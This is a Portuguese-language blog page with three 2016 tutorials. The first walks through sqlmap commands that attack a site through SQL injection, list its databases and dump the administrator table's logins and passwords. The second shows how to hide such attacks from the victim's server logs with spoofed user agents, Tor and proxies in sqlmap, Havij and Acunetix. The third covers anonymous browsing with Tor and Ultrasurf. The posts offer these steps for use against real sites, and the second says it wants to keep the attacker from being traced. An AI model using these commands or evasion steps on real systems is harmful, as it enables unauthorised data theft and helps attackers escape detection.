quarta-feira, 13 de abril de 2016

Publicado quarta-feira, abril 13, 2016 por com 0 comentário

Atacar site com a ferramenta SQLMap

A ferramenta sqlmap é muito utilizada no Linux para verificar vulnerabilidades sqlinjection em diversos sites, mas também tem sua versão para o Windows. Como ele tem inúmeras funções, vamos detalhar algumas e efetuar o ataque.



Ao fazer algumas buscas no Google encontramos diversos sites vulneráveis, mas nesse tutorial vamos utilizar um site fictício.

Vamos inserir a página vulnerável:
sqlmap -u http://www.site.com.br/index.php?id=9

Dependendo da versão do sqlmap devemos digitar da seguinte maneira:
python sqlmap.py -u http://www.site.com.br/index.php?id=9

Agora vamos descobrir a versão do Bando de Dados do site:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -b

Pegando todos os bancos de dados do site:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 --dbs

Como alguns sites retornam muitos bancos de dados é complicado explorar todos, por isso vamos apenas pegar o que o site utiliza:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 --current-db

Agora vamos pegar as tabelas do banco de dados:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco --tables

Explicando os parâmetros:
-D = Indica o nome do banco de dados que será utilizado.
--tables = Pega todas as tabelas do banco de dados.

Supõe que o site retornou as seguintes tabelas:
Notícias
Vídeos
Clientes
Administrador

Vamos descobrir as colunas da tabela que nos interessa, a tabela administrador:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador --columns

Explicando os parâmetros:
-T = Indica qual a tabela que vai ser usada
--columns = Pega todas as colunas da tabela desejada.

Supõe que dentro dessa tabela tinha as seguintes colunas:
nome
email
login
senha

Vamos pegar só as colunas interessantes, login e senha:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador -C login,senha --dump

Explicando os parâmetros:
-C =Indica quais colunas que vou pegar os dados
--dump = Puxa todos os dados

Você também pode retornar todas as tabelas com todas colunas:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco --tables --dump-all

Caso queira aumentar a segurança no ataque pode usar um proxy http,https ou socks:
python sqlmap.py -u http://www.site.com.br/index.php?id=9 -D nomedobanco -T administrador -C login,senha --dump --proxy http://127.0.0.0:9666

Caso queira saber sobre proxys no Sql Injection, veja esse tutorial aqui.


Ver mais
      edit

sexta-feira, 8 de abril de 2016

Publicado sexta-feira, abril 08, 2016 por com 1 comentário

Atacando Anônimo com SQL Injection

Se você acha que é só ligar o TOR ou algum outro proxy e fazer o ataque está muito enganado. Precisamos também configurar a ferramenta, caso contrário você ainda está exposto. Nesse tutorial irei abordar 3 ferramentas: SQLMap (muito utilizado na plataforma Linux), Havij (windows) e Acunetix (scan de vulnerabilidades).

SQLMap

Geralmente atacamos da seguinte maneira:

sqlmap -u vitima.com.br --dbs

Com isso os logs no site saíram assim:

200.98.45.235 - - [08/Abr/2016:17:21:59 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:01 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)

Nos logs, informações importantes são expostas, como o IP verdadeiro, mesmo usando o TOR, e o user-agent do browser, que no caso é sqlmap.

O primeiro passo é alterar o user-agent:

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10"

E os logs são expostos dessa maneira:

200.98.45.235 - - [08/Abr/2016:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:13 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:15 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10

Para camuflar bem o ataque podemos utilizar duas maneiras:

sqlmap -u vitima.com.br --dbs --random-agent  --tor --tor-type=SOCKS5

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10" --proxy=http://127.0.0.0:9666

OBS.: Na segunda forma estou usando o proxy Ultrasurf.
Assim, os logs saíram da seguinte maneira:

66.23.129.31 - - [08/Abr/2016:17:30:02 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:03 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10


Havij

Como é interface gráfica, é muito mais fácil. Primeiro vá em settings, general, marque a caixa "proxy" e no espaço digite 127.0.0.1 e na porta:9666 (TOR não pode ser utilizado no Havij, já que é um socks)
Em "Http Headers" altere o User-Agent para qualquer um de sua preferência, mas não deixe a padrão;
E clique em "Apply"



Acunetix

Vá em Configuration>Scan Settings>LAN Settings
Marque a caixa "Use an Http Proxy Server" e em "hostname" digite 127.0.0.1 e em "port" digite 9666.
Agora vá em HTTP Options e altere o UserAgent

OBS.: No Acunetix é possível usar o TOR como socks.







Outros user-agent que podem ser úteis futuramente:

Internet Explorer: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Opera: Opera/9.23 (Windows NT 5.1; U; en-US)
Safari: Opera/9.23 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
Ver mais
      edit

terça-feira, 5 de abril de 2016

Publicado terça-feira, abril 05, 2016 por com 0 comentário

Navegando anônimo na internet

Existem várias formas de navegar anônimo, e abordaremos principalmente proxies. Segundo o Wikipedia, proxy é o termo utilizado para definir os intermediários entre o usuário e seu servidor. E por isso desempenha a função de conexão do computador (local) à rede externa (Internet).

Se você quer apenas esconder seus rastros pode usar o Ctrl+Shift+N do Chrome, ou Ctrl+Shift+P do Firefox.



Caso deseje esconder seus rastros e ocultar seu IP podemos utilizar o TOR. Para sua utilização basta apenas baixá-lo aqui, e instalar normalmente, clicando em next, next, next.



Outra ferramenta muito boa é o Ultrasurf, que pode ser baixado aqui. Além de esconder seu IP, ele geralmente burla firewall e deixa você navegar normalmente em redes bloqueadas já que ele funciona como uma VPN, criando um túnel de navegação. Para quem não sabe, segundo o Wikipédia, VPN ou Virtual Private Network (Rede Privada Virtual) trata-se de uma rede privada construída sobre a infraestrutura de uma rede pública. Essa é uma forma de conectar dois computadores através de uma rede pública, como a Internet.







Observando a primeira imagem, principalmente o ícone diferenciado no canto esquerdo do navegador, concluímos que estou em modo anônimo utilizando o navegador. Juntamente com o Ultrasurf fica muito difícil para alguém rastrear.

Para confirmar se o seu IP mudou, basta entrar no site meu ip.
Ver mais
      edit